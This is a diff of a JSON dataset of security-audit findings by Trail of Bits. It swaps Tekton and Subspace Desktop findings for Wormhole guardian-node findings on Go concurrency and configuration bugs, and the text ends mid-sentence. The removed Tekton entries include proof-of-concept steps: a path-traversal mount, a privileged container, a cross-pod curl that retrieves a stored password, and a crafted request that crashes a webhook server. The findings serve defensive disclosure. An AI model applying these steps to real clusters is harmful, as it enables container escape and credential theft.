"https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "Calls to some Contexts cancel functions are missing along certain code paths involving panics. If an attacker were able to exercise these code paths in rapid succession, they could exhaust system resources and cause a DoS. Within watcher.go, WithTimeout is essentially used in one of two ways, using the pattern shown in either gure 6.1 or 6.2. The pattern of gure 6.1 is problematic because cancel will not be called if a panic occurs in MessageEventsForTransaction. By comparison, cancel will be called if a panic occurs after the defer statement in gure 6.2. Note that if a panic occurred in either gure 6.1 or 6.2, RunWithScissors (gure 6.3) would prevent the program from terminating. timeout, cancel := context.WithTimeout(ctx, 5*time.Second) blockNumber, msgs, err := MessageEventsForTransaction(timeout, w.ethConn, w.contract, w.chainID, tx) cancel() Figure 6.1: node/pkg/watchers/evm/watcher.go#L395L397 timeout, cancel := context.WithTimeout(ctx, 15*time.Second) defer cancel() Figure 6.2: node/pkg/watchers/evm/watcher.go#L186L187 // Start a go routine with recovering from any panic by sending an error to a error channel func RunWithScissors(ctx context.Context, errC chan error, name string, runnable supervisor.Runnable) { ScissorsErrors.WithLabelValues(\"scissors\", name).Add(0) go func() { defer func() { if r := recover(); r != nil { switch x := r.(type) { case error: errC <- fmt.Errorf(\"%s: %w\", name, x) default: errC <- fmt.Errorf(\"%s: %v\", name, x) } ScissorsErrors.WithLabelValues(\"scissors\", name).Inc() } }() err := runnable(ctx) if err != nil { errC <- err } }() } Figure 6.3: node/pkg/common/scissors.go#L20L41 Golangs ocial Context documentation states: The WithCancel, WithDeadline, and WithTimeout functions take a Context (the parent) and return a derived Context (the child) and a CancelFunc. Failing to call the CancelFunc leaks the child and its children until the parent is canceled or the timer res. In light of the above guidance, it seems prudent to call the cancel function, even along panicking paths. Note that the problem described applies to three locations in watch.go: one involving a call to MessageEventsForTransaction (gure 6.1), one involving a call to TimeOfBlockByHash, and one involving a call to TransactionReceipt. Exploit Scenario Eve discovers a code path she can call in rapid succession, which induces a panic in the call to MessageEventsForTransaction (gure 6.1). Eve exploits this code path to crash Wormhole nodes. Recommendations Short term, use the defer cancel() pattern (gure 6.2) wherever WithTimeout is used. This will help to prevent DoS conditions. Long term, regard all code involving Contexts with heightened scrutiny. Contexts are frequently a source of resource leaks in Go programs, and deserve elevated attention. References Golang Context WithTimeout Example", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "4. Insu\u0000cient validation of volumeMounts paths ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Tekton Pipelines extension performs a number of validations against task steps whenever a task is submitted for Tekton to process. One such validation veries that the path for a volume mount is not inside the /tekton directory. This directory is treated as a special directory by Tekton, as it is used for Tekton-specic functionality. However, the extension uses strings.HasPrefix to verify that MountPath does not contain the string /tekton/ without rst sanitizing it. As a result, it is possible to create volume mounts inside /tekton by using path traversal strings such as /somedir/../tekton/newdir in the volumeMounts variable of a task step denition. for j, vm := range s.VolumeMounts { if strings.HasPrefix(vm.MountPath, \"/tekton/\") && !strings.HasPrefix(vm.MountPath, \"/tekton/home\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(\"volumeMount cannot be mounted under /tekton/ (volumeMount %q mounted at %q)\", vm.Name, vm.MountPath), \"mountPath\").ViaFieldIndex(\"volumeMounts\", j)) } if strings.HasPrefix(vm.Name, \"tekton-internal-\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(`volumeMount name %q cannot start with \"tekton-internal-\"`, vm.Name), \"name\").ViaFieldIndex(\"volumeMounts\", j)) } } Figure 4.1: pipeline/pkg/apis/pipeline/v1beta1/task_validation.go#L218-L226 The YAML le in the gure below was used to create a volume in the reserved /tekton directory. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: vol-test spec: taskSpec: steps: - image: docker name: client workingDir: /workspace script: | #!/usr/bin/env sh sleep 15m volumeMounts: - mountPath: /certs/client/../../../tekton/mytest name: empty-path volumes: - name: empty-path emptyDir: {} Figure 4.2: Task run le used to create a volume mount inside an invalid location The gure below demonstrates that the previous le successfully created the mytest directory inside of the /tekton directory by using a path traversal string. $ kubectl exec -i -t vol-test -- /bin/sh Defaulted container \"step-client\" out of: step-client, place-tools (init), step-init (init), place-scripts (init) /workspace # cd /tekton/ /tekton # ls bin creds downward home scripts steps termination results run mytest Figure 4.3: Logging into the task pod container, we can now list the mytest directory inside of /tekton. Recommendations Short term, modify the code so that it converts the mountPath string into a le path and uses a function such as filepath.Clean to sanitize and canonicalize it before validating it.", + "title": "7. PolygonConnector does not properly use channels ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The Polygon connector does not read from the PollSubscription.quit channel, nor does it write to the PollSubscription.unsubDone channel. A caller who calls Unsubscribe on the PollSubscription could hang. A PollSubscription struct contains three channels: err, quit, and unsubDone (gure 7.1). Based on our understanding of the code, the entity that fullls the subscription writes to the err and unsubDone channels, and reads from the quit channel. Conversely, the entity that consumes the subscription reads from the err and unsubDone channels, and writes to the quit channel.1 type PollSubscription struct { errOnce err quit unsubDone chan struct{} sync.Once chan error chan error } Figure 7.1: node/pkg/watchers/evm/connectors/common.go#L38L43 More specically, the consumer can call PollSubscription.Unsubscribe, which writes ErrUnsubscribed to the quit channel and waits for a message on the unsubDone channel (gure 7.2). func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 7.2: node/pkg/watchers/evm/connectors/common.go#L59L68 1 If our understanding is correct, we recommend documenting these facts. However, the Polygon connector does not read from the quit channel, nor does it write to the unsubDone channel (gure 7.3). This is unlike BlockPollConnector (gure 7.4), for example. Thus, if a caller tries to call Unsubscribe on the Polygon connector PollSubscription, the caller may hang. select { case <-ctx.Done(): return nil case err := <-messageSub.Err(): sub.err <- err case checkpoint := <-messageC: if err := c.processCheckpoint(ctx, sink, checkpoint); err != nil { sub.err <- fmt.Errorf(\"failed to process checkpoint: %w\", err) } } Figure 7.3: node/pkg/watchers/evm/connectors/polygon.go#L120L129 select { case <-ctx.Done(): blockSub.Unsubscribe() innerErrSub.Unsubscribe() return nil case <-sub.quit: blockSub.Unsubscribe() innerErrSub.Unsubscribe() sub.unsubDone <- struct{}{} return nil case v := <-innerErrSink: sub.err <- fmt.Errorf(v) } Figure 7.4: node/pkg/watchers/evm/connectors/poller.go#L180L192 Exploit Scenario Alice, a Wormhole developer, adds a code path that involves calling Unsubscribe on a Polygon connectors PollSubscription. By doing so, Alice introduces a deadlock into the code. Recommendations Short term, adjust the code in gure 7.3 so that it reads from the quit channel and writes to the unsubDone channel, similar to how the code in gure 7.4 does. This will eliminate a class of code paths along which hangs or deadlocks could occur. Long term, consider refactoring the code so that the select statements in gures 7.3 and 7.4, as well as a similar statement in LogPollConnector, are consolidated under a single function. The three statements appear similar in their behavior; combining them would make the code more robust against future changes and could help to prevent bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "7. Insu\u0000cient security hardening of step containers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Containers used for running task and pipeline steps have excessive security context options enabled. This increases the attack surface of the system, and issues such as Linux kernel bugs may allow attackers to escape a container if they gain code execution within a Tekton container. The gure below shows the security properties of a task container with the docker driver. 0 0 0 0 0 0 cat 0 0 # cat /proc/self/status | egrep 'Name|Uid|Gid|Groups|Cap|NoNewPrivs|Seccomp' Name: Uid: Gid: Groups: CapInh: 00000000a80425fb CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 NoNewPrivs: 0 0 Seccomp: Seccomp_filters: 0 Figure 7.1: The security properties of one of the step containers Exploit Scenario Eve nds a bug that allows her to run arbitrary code on behalf of a conned process within a container, using it to gain more privileges in the container and then to attack the host. Recommendations Short term, drop default capabilities from containers and prevent processes from gaining additional privileges by setting the --cap-drop=ALL and --security-opt=no-new-privileges:true ags when starting containers. Long term, review and implement the Kubernetes security recommendations in appendix C.", + "title": "8. Receiver closes channel, contradicting Golang guidance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "According to Golangs ocial guidance, Only the sender should close a channel, never the receiver. Sending on a closed channel will cause a panic. However, along some code paths within the watcher code, the receiver of a channel closes the channel. When PollSubscription.Unscbscribe is called, it closes the err channel (gure 8.1). However, in logpoller.go (gure 8.2), the caller of Unsubscribe (red) is clearly an err channel receiver (green). func (sub *PollSubscription) Err() <-chan error { return sub.err } func (sub *PollSubscription) Unsubscribe() { sub.errOnce.Do(func() { select { case sub.quit <- ErrUnsubscribed: <-sub.unsubDone case <-sub.unsubDone: } close(sub.err) }) } Figure 8.1: node/pkg/watchers/evm/connectors/common.go#L55L68 sub, err := l.SubscribeForBlocks(ctx, errC, blockChan) if err != nil { return err } defer sub.Unsubscribe() supervisor.Signal(ctx, supervisor.SignalHealthy) for { select { case <-ctx.Done(): return ctx.Err() case err := <-sub.Err(): return err case err := <-errC: return err case block := <-blockChan: if err := l.processBlock(ctx, logger, block); err != nil { l.errFeed.Send(err.Error()) } } } Figure 8.2: node/pkg/watchers/evm/connectors/logpoller.go#L49L69 Exploit Scenario Eve discovers a code path along which a sender tries to send to an already closed err channel and panics. RunWithScissors (see TOB-WORMGUWA-6) prevents the node from terminating, but the node is left in an undetermined state. Recommendations Short term, eliminate the call to close in gure 8.1. This will eliminate a class of code paths along which the err channels sender(s) could panic. Long term, for each channel, document who the expected senders and receivers are. This will help catch bugs like this one. References A Tour of Go: Range and Close", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "8. Tekton allows users to create privileged containers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton allows users to dene task and sidecar objects with a privileged security context, which eectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insucient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun denition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in gure 8.1, it is now possible to write to several les in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to dene a privileged security context for step containers, and include guidance on how to restrict such a feature.", + "title": "9. Watcher conguration is overly complex ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The Run function of the Watcher congures each chains connection based on its elds, unsafeDevMode and chainID. This is done in a series of nested if-statements that span over 100 lines, amounting to a cyclomatic complexity over 90 which far exceeds what is considered complex. In order to make the code easier to understand, test, and maintain, it should be refactored. Rather than handling all of the business logic in a monolithic function, the logic for each chain should be isolated within a dedicated helper function. This would make the code easier to follow and reduce the likelihood that an update to one chains conguration inadvertently introduces a bug for other chains. if w.chainID == vaa.ChainIDCelo && !w.unsafeDevMode { // When we are running in mainnet or testnet, we need to use the Celo ethereum library rather than go-ethereum. // However, in devnet, we currently run the standard ETH node for Celo, so we need to use the standard go-ethereum. w.ethConn, err = connectors.NewCeloConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, \"dial_error\").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf(\"dialing eth client failed: %w\", err) } } else if useFinalizedBlocks { if w.chainID == vaa.ChainIDEthereum && !w.unsafeDevMode { safeBlocksSupported = true logger.Info(\"using finalized blocks, will publish safe blocks\") } else { logger.Info(\"using finalized blocks\") } [...] /* many more nested branches */ Figure 9.1: node/pkg/watchers/evm/watcher.go#L192L326 Exploit Scenario Alice, a wormhole developer, introduces a bug that causes guardians to run in unsafe mode in production while adding support for a new evm chain due to the diculty of modifying and testing the nested code. Recommendations Short term, isolate each chains conguration into a helper function and document how the congurations were determined. Long term, run linters in CI to identify code with high cyclomatic complexity and consider whether complex code can be simplied during code reviews.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Medium" ] }, { - "title": "9. Insu\u0000cient default network access controls between pods ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "By default, containers deployed as part of task steps do not have any egress or ingress network restrictions. As a result, containers could reach services exposed over the network from any task step container. For instance, in gure 9.2, a user logs into a container running a task step in the developer-group namespace and successfully makes a request to a service in a step container in the qa-group namespace. root@build-push-secret-35-pod:/# ifconfig eth0: flags=4163 mtu 1500 inet 172.17.0.17 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:11 txqueuelen 0 (Ethernet) RX packets 21831 bytes 32563599 (32.5 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6465 bytes 362926 (362.9 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@build-push-secret-35-pod:/# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 172.17.0.16 - - [08/Mar/2022 01:03:50] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - 172.17.0.16 - - [08/Mar/2022 01:04:05] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - Figure 9.1: Exposing a simple server in a step container in the developer-group namespace root@build-push-secret-35-pod:/# curl 172.17.0.17:8000/tekton/creds-secrets/basic-user-pass-canary/password mySUPERsecretPassword Figure 9.2: Reaching the service exposed in gure 9.1 from another container in the qa-group namespace Exploit Scenario An attacker launches a malicious task container that reaches a service exposed via a sidecar container and performs unauthorized actions against the service. Recommendations Short term, enforce ingress and egress restrictions to allow only resources that need to speak to each other to do so. Leverage allowlists instead of denylists to ensure that only expected components can establish these connections. Long term, ensure the use of appropriate methods of isolation to prevent lateral movement. 10. Import resources\" feature does not validate repository path Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-10 Target: Dashboard", + "title": "10. evm.Watcher.Runs default behavior could hide bugs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "evm.Watcher.Run tries to create an evm watcher, even if called with a ChainID that does not correspond to an evm chain. Additional checks should be added to evm.Watcher.Run to reject such ChainIDs. Approximately 60 watchers are started in node/cmd/guardiand/node.go (gure 10.1). Fifteen of those starts result in calls to evm.Watcher.Run. Given the substantial number of ChainIDs, one can imagine a bug where a developer tries to create an evm watcher with a ChainID that is not for an evm chain. Such a ChainID would be handled by the blanket else in gure 10.2, which tries to create an evm watcher. Such behavior could allow the bug to go unnoticed. To avoid this possibility, evm.Watcher.Runs default behavior should be to fail rather than to create a watcher. if shouldStart(ethRPC) { ... ethWatcher = evm.NewEthWatcher(*ethRPC, ethContractAddr, \"eth\", common.ReadinessEthSyncing, vaa.ChainIDEthereum, chainMsgC[vaa.ChainIDEthereum], setWriteC, chainObsvReqC[vaa.ChainIDEthereum], *unsafeDevMode) ... } if shouldStart(bscRPC) { ... bscWatcher := evm.NewEthWatcher(*bscRPC, bscContractAddr, \"bsc\", common.ReadinessBSCSyncing, vaa.ChainIDBSC, chainMsgC[vaa.ChainIDBSC], nil, chainObsvReqC[vaa.ChainIDBSC], *unsafeDevMode) ... } if shouldStart(polygonRPC) { ... polygonWatcher := evm.NewEthWatcher(*polygonRPC, polygonContractAddr, \"polygon\", common.ReadinessPolygonSyncing, vaa.ChainIDPolygon, chainMsgC[vaa.ChainIDPolygon], nil, chainObsvReqC[vaa.ChainIDPolygon], *unsafeDevMode) } ... Figure 10.1: node/cmd/guardiand/node.go#L1065L1104 ... } else if w.chainID == vaa.ChainIDOptimism && !w.unsafeDevMode { ... } else if w.chainID == vaa.ChainIDPolygon && w.usePolygonCheckpointing() { ... } else { w.ethConn, err = connectors.NewEthereumConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, \"dial_error\").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf(\"dialing eth client failed: %w\", err) } } Figure 10.2: node/pkg/watchers/evm/watcher.go#L192L326 Exploit Scenario Alice, a Wormhole developer, introduces a call to NewEvmWatcher with a ChainID that is not for an evm chain. evm.Watcher.Run accepts the invalid ChainID, and the error goes unnoticed. Recommendations Short term, rewrite evm.Watcher.Run so that a new watcher is created only when a ChainID for an evm chain is passed. When a ChainID for some other chain is passed, evm.Watcher.Run should return an error. Adopting such a strategy will help protect against bugs in node/cmd/guardiand/node.go. Long term: Add tests to the guardiand package to verify that the right watcher is created for each ChainID. This will help ensure the packages correctness. Consider whether TOB-WORMGUWA-9s recommendations should also apply to node/cmd/guardiand/node.go. That is, consider whether the watcher conguration should be handled in node/cmd/guardiand/node.go, as opposed to evm.Watcher.Run. The le node/cmd/guardiand/node.go appears to suer from similar complexity issues. It is possible that a single strategy could address the shortcomings of both pieces of code.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "13. Nil dereferences in the trigger interceptor logic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Process functions, which are responsible for executing the various triggers for the git, gitlab, bitbucket, and cel interceptors, do not properly validate request objects, leading to nil dereference panics when requests are submitted without a Context object. func (w *Interceptor) Process(ctx context.Context, r *triggersv1.InterceptorRequest) *triggersv1.InterceptorResponse { headers := interceptors.Canonical(r.Header) // (...) // Next validate secrets if p.SecretRef != nil { // Check the secret to see if it is empty if p.SecretRef.SecretKey == \"\" { interceptor secretRef.secretKey is empty\") return interceptors.Fail(codes.FailedPrecondition, \"github } // (...) ns, _ := triggersv1.ParseTriggerID(r.Context.TriggerID) Figure 13.1: triggers/pkg/interceptors/github/github.go#L48-L85 We tested the panic by forwarding the Tekton Triggers webhook server to localhost and sending HTTP requests to the GitHub endpoint. The Go HTTP server recovers from the panic. curl -i -s -k -X $'POST' \\ -H $'Host: 127.0.0.1:1934' -H $'Content-Length: 178' \\ --data-binary $'{\\x0d\\x0a\\\"header\\\":{\\x0d\\x0a\\\"X-Hub-Signature\\\":[\\x0d\\x0a\\x09\\\"sig\\\"\\x0d\\x0a],\\x0 d\\x0a\\\"X-GitHub-Event\\\":[\\x0d\\x0a\\\"evil\\\"\\x0d\\x0a]\\x0d\\x0a},\\x0d\\x0a\\\"interceptor_pa rams\\\": {\\x0d\\x0a\\x09\\\"secretRef\\\": {\\x0d\\x0a\\x09\\x09\\\"secretKey\\\":\\\"key\\\",\\x0d\\x0a\\x09\\x09\\\"secretName\\\":\\\"name\\\"\\x0d\\x 0a\\x09}\\x0d\\x0a}\\x0d\\x0a}' \\ $'http://127.0.0.1:1934/github' Figure 13.2: The curl request that causes a panic 2022/03/08 05:34:13 http: panic serving 127.0.0.1:49304: runtime error: invalid memory address or nil pointer dereference goroutine 33372 [running]: net/http.(*conn).serve.func1(0xc0001bf0e0) net/http/server.go:1824 +0x153 panic(0x1c25340, 0x30d6060) runtime/panic.go:971 +0x499 github.com/tektoncd/triggers/pkg/interceptors/github.(*Interceptor).Process(0xc00000 d248, 0x216fec8, 0xc0003d5020, 0xc0002b7b60, 0xc0000a7978) github.com/tektoncd/triggers/pkg/interceptors/github/github.go:85 +0x1f5 github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ExecuteInterceptor(0x c000491490, 0xc000280200, 0x0, 0x0, 0x0, 0x0, 0x0) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:128 +0x5df github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ServeHTTP(0xc00049149 0, 0x2166dc0, 0xc0000d42a0, 0xc000280200) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:57 +0x4d net/http.(*ServeMux).ServeHTTP(0xc00042d000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2448 +0x1ad net/http.serverHandler.ServeHTTP(0xc0000d4000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2887 +0xa3 net/http.(*conn).serve(0xc0001bf0e0, 0x216ff00, 0xc00042d200) net/http/server.go:1952 +0x8cd created by net/http.(*Server).Serve net/http/server.go:3013 +0x39b Figure 13.3: Panic trace Exploit Scenario As the codebase continues to grow, a new mechanism is added to call one of the Process functions without relying on HTTP requests (for instance, via a custom RPC client implementation). An attacker uses this mechanism to create a new interceptor. He calls the Process function with an invalid object, causing a panic that crashes the Tekton Triggers webhook server. Recommendations Short term, add checks to verify that request Context objects are not nil before dereferencing them. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "11. Race condition in TestBlockPoller ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "A race condition causes TestBlockPoller to fail sporadically with the error message in gure 11.1. For a test to be of value, it must be reliable. poller_test.go:300: Error Trace: Error: .../node/pkg/watchers/evm/connectors/poller_test.go:300 Received unexpected error: polling encountered an error: failed to look up latest block: RPC failed Test: TestBlockPoller Figure 11.1: Error produced when TestBlockPoller fails A potential code interleaving causing the above error appears in gure 11.2. The interleaving can be explained as follows: The main thread sets the baseConnectors error and yields (left column). The go routine declared at poller_test.go:189 retrieves the error, sets the err variable, loops, retrieves the error a second time, and yields (right column). The main thread locks the mutex, veries that err is set, clears err, and unlocks the mutex (left). The go routine sets the err variable a second time (right). The main thread locks the mutex and panics because err is set (left). baseConnector.setError(fmt.Errorf(\"RPC failed\")) case thisErr := <-headerSubscription.Err(): mutex.Lock() err = thisErr mutex.Unlock() ... case thisErr := <-headerSubscription.Err(): time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) assert.Error(t, err) assert.Nil(t, block) baseConnector.setError(nil) err = nil mutex.Unlock() // Post the next block and verify we get it (so we survived the RPC error). baseConnector.setBlockNumber(0x309a10) time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) require.NoError(t, err) mutex.Lock() err = thisErr mutex.Unlock() Figure 11.2: Interleaving of node/pkg/watchers/evm/connectors/poller_test.go#L283L300 (left) and node/pkg/watchers/evm/connectors/poller_test.go#L198L201 (right) that causes an error Exploit Scenario Alice, a Wormhole developer, ignores TestBlockPoller failures because she believes the test to be aky. In reality, the test is agging a bug in Alices code, which she commits to the Wormhole repository. Recommendations Short term: Use dierent synchronization mechanisms in order to eliminate the race condition described above. This will increase TestBlockPollers reliability. Have the main thread sleep for random rather than xed intervals. This will help to expose bugs like this one. Long term, investigate automated tools for nding concurrency bugs in Go programs. This bug is not agged by Gos race detector. As a result, dierent analyses are needed.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Medium" ] }, { - "title": "1. Desktop application conguration le stored in group writable le ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The desktop application conguration le has group writable permissions, as shown in gure 1.1. >>> ls -l $HOME/.config/subspace-desktop/subspace-desktop.cfg -rw-rw-r-- 1 user user 143 $HOME/.config/subspace-desktop/subspace-desktop.cfg Figure 1.1: Permissions of the $HOME/.config/subspace-desktop/subspace-desktop.cfg le This conguration le contains the rewardAddress eld (gure 1.2), to which the Subspace farmer sends the farming rewards. Therefore, anyone who can modify this le can control the address that receives farming rewards. For this reason, only the le owner should have the permissions necessary to write to it. { \"plot\" : { \"location\" : \"/.local/share/subspace-desktop/plots\" , \"sizeGB\" : 1 }, \"rewardAddress\" : \"stC2Mgq\" , \"launchOnBoot\" : true , \"version\" : \"0.6.11\" , \"nodeName\" : \"agreeable-toothbrush-4936\" } Figure 1.2: An example of a conguration le Exploit Scenario An attacker controls a Linux user who belongs to the victims user group. Because every member of the user group is able to write to the victims conguration le, the attacker is able to change the rewardAddress eld of the le to an address she controls. As a result, she starts receiving the victims farming rewards. Recommendations Short term, change the conguration les permissions so that only its owner can read and write to it. This will prevent unauthorized users from reading and modifying the le. Additionally, create a centralized function that creates the conguration le; currently, the le is created by code in multiple places in the codebase. Long term, create tests to ensure that the conguration le is created with the correct permissions. 2. Insu\u0000cient validation of users reward addresses Severity: Low Diculty: Medium Type: Data Validation Finding ID: TOB-SPDF-2 Target: subspace-desktop/src/pages/ImportKey.vue", + "title": "12. Unconventional test structure ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "Tilt is the primary means of testing Wormhole watchers. Relying on such a coarse testing mechanism makes it dicult to know that all necessary conditions and edge cases are tested. The following are some conditions that should be checked by native Go unit tests: The right watcher is created for each ChainID (TOB-WORMGUWA-10). The evm watchers connectors behave correctly (similar to how the evm nalizers correct behavior is now tested).2 The evm watchers logpoller behaves correctly (similar to how the pollers correct behavior is now tested by poller_test.go). There are no o-by-one errors in any inequality involving a block or round number. Examples of such inequalities include the following: node/pkg/watchers/algorand/watcher.go#L225 node/pkg/watchers/algorand/watcher.go#L243 node/pkg/watchers/solana/client.go#L363 node/pkg/watchers/solana/client.go#L841 To be clear, we are not suggesting that the Tilt tests be discarded. However, the Tilt tests should not be the sole means of testing the watchers for any given chain. Exploit Scenario Alice, a Wormhole developer, introduces a bug into the codebase. The bug is not exposed by the Tilt tests. Recommendations Short term, develop unit tests for the watcher code. Get as close to 100% code coverage as possible. Develop specic unit tests for conditions that seem especially problematic. These steps will help ensure the correctness of the watcher code. 2 Note that the evm watchers nalizers have nearly 100% code coverage by unit tests. Long term, regularly review test coverage to help identify gaps in the tests as the code evolves.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2202,19 +4970,19 @@ ] }, { - "title": "3. Improper error handling ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The front end code handles errors incorrectly in the following cases: The Linux auto launcher function createAutostartDir does not return an error if it fails to create the autostart directory. The Linux auto launcher function enable does not return an error if it fails to create the autostart le. The Linux auto launcher function disable does not return an error if it fails to remove the autostart le. The Linux auto launcher function isEnabled always returns true , even if it fails to read the autostart le, which indicates that the auto launcher is disabled. The exportLogs function does not display error messages to users when errors occur. Instead, it silently fails. If rewardAddress is not set, the startFarming function sends an error log to the back end but not to the front end. Despite the error, the function still tries to start farming without a reward address, causing the back end to error out. Without an error message displayed in the front end, the source of the failure is unclear. The Config::init function does not show users an error message if it fails to create the conguration directory. The Config::write function does not show users an error message if it fails to create the conguration directory, and it proceeds to try to write to the nonexistent conguration le. Additionally, it does not show an error message if it fails to write to the conguration le in its call to writeFile . The removePlot function does not return an error if it fails to delete the plots directory. The createPlotDir function does not return an error if it fails to create the plots folder (e.g., if the given user does not have the permissions necessary to create the folder in that directory). This will cause the startPlotting function to fail silently; without an error message, the user cannot know the source of the failure. The createAutostartDir function logs an error unnecessarily. The function determines whether a directory exists by calling the readDir function; however, even though occasionally the directory may not be found (as expected), the function always logs an error if it is not found. Exploit Scenario To store his plots, a user chooses a directory that he does not have the permissions necessary to write to. The program fails but does not display a clear error message with the reason for the failure. The user cannot understand the problem, becomes frustrated, and deletes the application. Recommendations Short term, modify the code in the locations described above to handle errors consistently and to display messages with clear reasons for the errors in the UI. This will make the code more reliable and reduce the likelihood that users will face obstacles when using the Subspace Desktop application. Long term, write tests that trigger all possible error conditions and check that all errors are handled gracefully and are accompanied by error messages displayed to the user where relevant. This will prevent regressions during the development process.", + "title": "13. Vulnerable Go packages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "govulncheck reports that the packages used by Wormhole in table 13.1 have known vulnerabilities, which are described in the following table. Package Vulnerability", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "4. Flawed regex in the Tauri conguration ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The Tauri conguration that limits which les the front end can open with the systems default applications is awed. As shown in gure 4.1, the conguration le uses the [/subspace\\\\-desktop/] regex; the Subspace developers intended this regex to match le names that include the /subspace-desktop/ string, but the regex actually matches any string that has a single character inside the 